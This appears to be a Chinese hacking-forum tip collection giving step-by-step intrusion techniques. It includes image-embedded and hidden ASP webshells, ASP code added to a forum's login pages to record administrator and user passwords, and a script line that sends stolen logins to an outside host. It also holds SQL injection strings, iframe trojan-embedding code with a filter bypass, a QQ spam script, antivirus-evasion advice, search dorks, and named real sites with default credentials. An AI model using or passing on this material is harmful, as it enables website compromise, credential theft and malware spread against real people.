1.名稱：如何制作圖片ASP木馬 （可顯示圖片） 
建一個asp文件，內(nèi)容為<!--＃i nclude file="ating.jpg"--> 
找一個正常圖片ating.jpg，插入一句話木馬（比如冰狐的）,用ultraedit進行hex編譯，插入圖片里，為 
了運行成功，還要搜索<%和％>,將其變?yōu)?0,(不要替換自己asp的),再把jpg文件開頭加入 
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT> 

2. 名稱：整蠱網(wǎng)吧 
先用精銳網(wǎng)吧輔助工具得到用戶名和密碼，然后用計算機管理聯(lián)結(jié)一臺機器，開telnet,連接，開共享， 

復制一個木馬過去運行即可。 

3．名稱：感受MD5的魅力 
rainbowcrack用法先用rtgen生成庫 "rtgen md5 byte 1 7 5 2400 40000 all" 
1和7代表密碼最小和最大長度 
阿汀我再加個方法：http://md5.rednoize.com/ 在線破解 
或者到http://www.md5lookup.com/?category=01-3&;searck=on 

4.很多時候我們做免殺木馬，不用懂匯編，用北斗加殼程序就能逃殺，還有很多加殼軟件，大家木馬加殼 

的時候最好多選擇不知名的加殼軟件 

5．名稱：隱蔽的插入型ASP木馬 
(1)在我們要做手腳的asp文件里加入如下內(nèi)容 
<%if request("action")="ok" then%> 
shell代碼插在這里，最好是小馬，還要加密一下 
<%end if%> 
訪問的時候在你作手腳的asp文件后面加上?action=ok,即可 
(2)另一種方法，在我們要做手腳的asp文件里加入如下內(nèi)容 
<% 
on error resume next 
strFileName = Request.QueryString("filer") 
set objStream = Server.createObject("ABODB.Stream") 
objStream.Type = 1 
objStream.Open 
objStream.LoadFromFile strFileName 
objStream.SaveToFile Server.mappath("ating.asp"),2 
%> 
訪問的時候在做手腳的asp文件后面加上?filer=XXX 
XXX為你本地上傳的一個路徑如 c:ating123.asp 
上傳后在做手腳的asp的同文件夾中有ating,asp 
（3）前提得到system權限， 
進入網(wǎng)站目錄下一層 
mkdir s… 
copy ating.asp s…/ 
這樣殺毒軟件找不到的 
訪問http://網(wǎng)站/s…/ating.asp即可 

6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar，此工具在該電腦生成一個超級用戶 用戶名為： 

hack 密碼110，在DOS下和計算機管理器上看不到你建立的用戶，并且是刪除不掉的 

7．名稱：QQ群腳本攻擊 
打開qq對話誆，復制消息，然后 
下面的內(nèi)容保存為.vbs 文件，運行即可 
Set WshShell= WScript.createobject("WScript.Shell") 
WshShell.AppActivate "QQ信息攻擊腳本" 
for i=1 to 20 
WScript.Sleep 1000 
WshShell.SendKeys"^v" 
WshShell.SendKeys i 
WshShell.SendKeys "%s" 
Next 

8．搜索：程序制作：萬鵬 有免費申請空間的，直接上傳asp馬即可 

9. 名稱：全面找出你站上的ASP木馬 
（1） 用殺毒軟件 
（2） 用FTP客戶端軟件，點"工具"->"比較文件夾" 
（3） 用asplist2.0.asp上傳到站點空間查看，一般功能多的ASP我估計就是ASP木馬 
（4） 用工具Beyond Compare 

10名稱：拓展思路拿DVBBS帳號 "一個人的圣經(jīng)"的動畫 
（1）以前獲得webshell后想進入DVBBS的后臺,想要管理員的密碼，可以這樣 
老辦法: 
修改admin_login.asp得到明文DVBBS后臺密碼 
在"username=trim(replace(request("username")這行后面 
Dim fsoObject 
Dim tsObject 
Set fsoObject = Server.createObject("Scripting.FileSystemObject") 
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) 
tsObject.Write CStr(request("password")) 
Set fsoObject = Nothing 
Set tsObject = Nothing 
只要管理員登陸后臺，在目錄下就生成了laner.txt 
（2）login.asp中Case "login_chk"下: 
on error resume next 
Dim rain 
set rain=server.createobject("adodb.stream") 
rain.Type=2 
rain.CharSet="gb2312" 
rain.Position=rain.Size 
rain.Open 
rain.LoadFromFile server.MapPath("laner.asp") 
rain.writetext now&request("username")&"text:"&request("password")&chr(10) 
rain.SaveToFile server.MapPath("laner.asp"),2 
rain.Close 
set rain=nothing 
這樣laner.asp將獲得全部登陸人的登陸時間，用戶名和密碼 
（3）如果你有自己的網(wǎng)站或者另外的webshell(強烈建議使用): 
可以建立目錄laner,在里面建立一個空的laner.asp和如下代碼的rain.asp: 
<%if request("n")<>"" and request("p")<>"" then 
on error resume next 
Dim rain 
set rain=server.createobject("adodb.stream") 
rain.Type=2 
rain.CharSet="gb2312" 
rain.Position=rain.Size 
rain.Open 
rain.LoadFromFile server.MapPath("laner.asp") 
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10) 
rain.SaveToFile server.MapPath("laner.asp"),2 
rain.Close 
set rain=nothing 
end if%> 

11. 名稱：利用QQ在線狀態(tài)抓鴿子肉雞 
生成qq在線狀態(tài)，把里面的地址改成木馬地址，發(fā)到論壇 
在login.asp那里插入一句: 
response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n="&request("username") 

&""&"&p="&request("password")&"></script>" 
response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request("username") 

&""&"&p="&request("password")&"></iframe>" 
結(jié)果所有登陸人都會乖乖的把名字和密碼送到你的laner.asp 里 

12. 動畫名稱：媒體中國整站程序存在多處漏洞 
漏洞程序:媒體中國整站程序(第一版) 
官方網(wǎng)站:http://meiti.elgod.com/ 
漏洞: %5c(暴庫) 上傳 注入 
上傳頁面:down1/upload.asp 

13. 名稱：免費電話＋MSH命令行工具 
http://www.globe7.com/ 打開主頁，點擊坐下角，F(xiàn)ree DownLoad，下載到本地，安裝， 
運行后，會提示正在尋找你所在地區(qū)的區(qū)號。由于是國際長途，注冊一個帳號，送100美分，國內(nèi)計時 

0.01/分，你就有100分鐘可以白打。是一個帳號哦。 
要注意的就是，固定電話，小靈通 形式為0086521123456 521本來時0521，要省略前面的零，手機號也 

是一樣。 

14. 名稱：Bo-Blog的新漏洞 
http://網(wǎng)址/index.php?job=../admin/ban 
把其中"禁止搜索的詞"那部分<table>另存出來，里面的地址改完整，插入一句話木馬 

16. 程序: 宏達企業(yè)整站上傳漏洞 
官方主頁:http://www.mu126.com/ 
漏洞頁面:/cx/upfile.asp (上傳漏洞) 

17．無間盜郵箱，在修改密碼里，用戶名和密碼里添or=or 

18．名稱： bbsxp5.16后臺得到webshell 
bbsxp5.16過濾了 asp,asp,cdx,cer,擴展名的文件上傳，就是在基本設置上添加上上傳類型也不行，并禁 

止了修改數(shù)據(jù)備份數(shù)據(jù)名稱，我們可以把此網(wǎng)頁保存在本地，改源代碼上傳。 

19．名稱：JHACKJ 2005年最新精典教程 
下載看看吧，不錯，各大網(wǎng)站都有 

20．名稱：省力入侵韓國肉雞 
在啊D的掃描注入點項，打開這個：http://www.google.co.kr/advanced_search?hl=zh-CN 
這是高級搜索項，關鍵字隨便寫。這里我寫asp?name= 設置為每頁顯示100條。 
語種選擇韓文。搜索，很多sa. 

21．名稱：任何網(wǎng)吧的管理系統(tǒng)破解 
選智能ABC，然后vv輸入，光標后退兩步，按delete鍵 剛輸入的兩個vv刪除 
最后按Inter鍵 

22．名稱：破解QQ空間插入網(wǎng)頁木馬的代碼 
現(xiàn)在騰訊 已經(jīng)封了很多QQ空間代碼了 就如 以前 <iframe src="木馬地址" name="lcx" width="0" 

height="0" frameborder="0"></iframe>插入網(wǎng)頁木馬的代碼也早被封了 
突破禁用的方法 代碼如下： 
<div id=DI><img src="javascript :DI.innerHTML=\<iframe src=木馬地址 width=190 height=190 

marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\" 

style=display:none></div> 

最后附上 卡拉是條ok 總結(jié)的 
1.上傳漏洞[不多講] 
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)"請登陸后使用"，80%就有漏洞了！ 
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳. 

2.注入漏洞[不多講] 
pS:對MD5密碼.有時我們不是哪么容易跑出來.如果是[SQL數(shù)據(jù)庫].那么我們可以用以下命令: 
http://注入網(wǎng)址;update admin set password=\新MD5密碼\ where password=\舊MD5密碼\-- 

[admin為表名.] 


3.旁注,也就是跨站. 
我們?nèi)肭帜痴緯r可能這個站堅固的無懈可擊，我們可以找下和這個站同一服務器的站點，然后在利用這個 

站點用提權，嗅探等方法來入侵我們 要入侵的站點。，在這里有個難點，就是一些服務器的絕對路徑經(jīng) 

過加密，這就看我們的本事了 


4.暴庫:把二級目錄中間的/換成%5c 
EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=職責范圍&BigClassType=1 
如果你能看到：\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一個有效的路徑。 確定路 

徑名稱拼寫是否正確，以及是否 連接到文件存放的服務器。 
這樣的就是數(shù)據(jù)庫了。下載時用FLASHGET換成.MDB格式的就行. 


5.\or\=\or\這是一個可以連接SQL的語名句.可以直接進入后臺。我收集了一下。類似的還有： 
\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a 

6.社會工程學。這個我們都知道吧。就是猜解。 
?。牛伲篽ttp://www.neu.edu.cn/waishi/admin 
admin waishi 

７.寫入ASP格式數(shù)據(jù)庫。就是一句話木馬[<%execute request("value")%> ]，常用在留言本. 
ＥＹ：http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[這個就是ASP格式的數(shù)據(jù)庫]，再寫入一句話 

木馬 


8.源碼利用：一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長很菜.什么也不改. 
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp 
這個站用的是：杰出校友錄，源碼我下過了， 
默認數(shù)據(jù)庫/webshell路徑：databaseliangu_data.mdb 后臺管理：adm_login.asp 密碼及用戶名都是 

admin 


9.默認數(shù)據(jù)庫/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的WEBSHELL. 
/Databackup/dvbbs7.MDB 
/bbs/Databackup/dvbbs7.MDB 
/bbs/Data/dvbbs7.MDB 
/data/dvbbs7.mdb 
/bbs/diy.asp 
/diy.asp 
/bbs/cmd.asp 
/bbs/cmd.exe 
/bbs/s-u.exe 
/bbs/servu.exe 
工具：網(wǎng)站獵手 挖掘雞 
EY：http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB 

10.查看目錄法:人一些網(wǎng)站可以斷開目錄，可以方問目錄。 
EY：http://www.ujs168.com/shop/admin/ 
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/ 
這樣我們可以找到數(shù)據(jù)庫，下載不用我教吧 

11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[這種方法可以取得大量的WEBSHELL] 

12.搜索引擎利用: 

(1).inurl:flasher_list.asp 默認數(shù)據(jù)庫:database/flash.mdb 后臺/manager/ 
(2).找網(wǎng)站的管理后臺地址: 
site:xxxx.comintext:管理 
site:xxxx.comintitle:管理 <關鍵字很多，自已找> 
site:xxxx.cominurl:login 
(3).查找access的數(shù)據(jù)庫,mssql、mysql的連接文件 
allinurl:bbsdata 
filetype:mdbinurl:database 
filetype:incconn 
inurl:datafiletype:mdb 
我主不做了。。自已做做吧。。 

13.COOKIE欺騙：把自己的ID修改成管理員的，MD5密碼也修改成他的，用桂林老兵工具可以修改COOKIE。 

這個我就不多講了 


14.利用常見的漏洞：如動網(wǎng)BBS 
EY：http://js1011.com/bbs/index.asp 
可以先用:dvbbs權限提升工具，使自已成為前臺管理員。 
THEN，運用:動網(wǎng)固頂貼工具，找個固頂貼，再取得COOKIES，這個要你自已做。我們可以用WSockExpert 

取得Cookies/NC包 
這個我就不做了，網(wǎng)上教程多的是，自已下個看看。 
工具：dvbbs權限提升工具 動網(wǎng)固頂貼工具 

15.還有一些老漏洞。如IIS3，4的查看源碼，5的delete 
CGI，PHP的一些老洞，我就不說了啊。。太老了。沒有什么大用途。

最新評論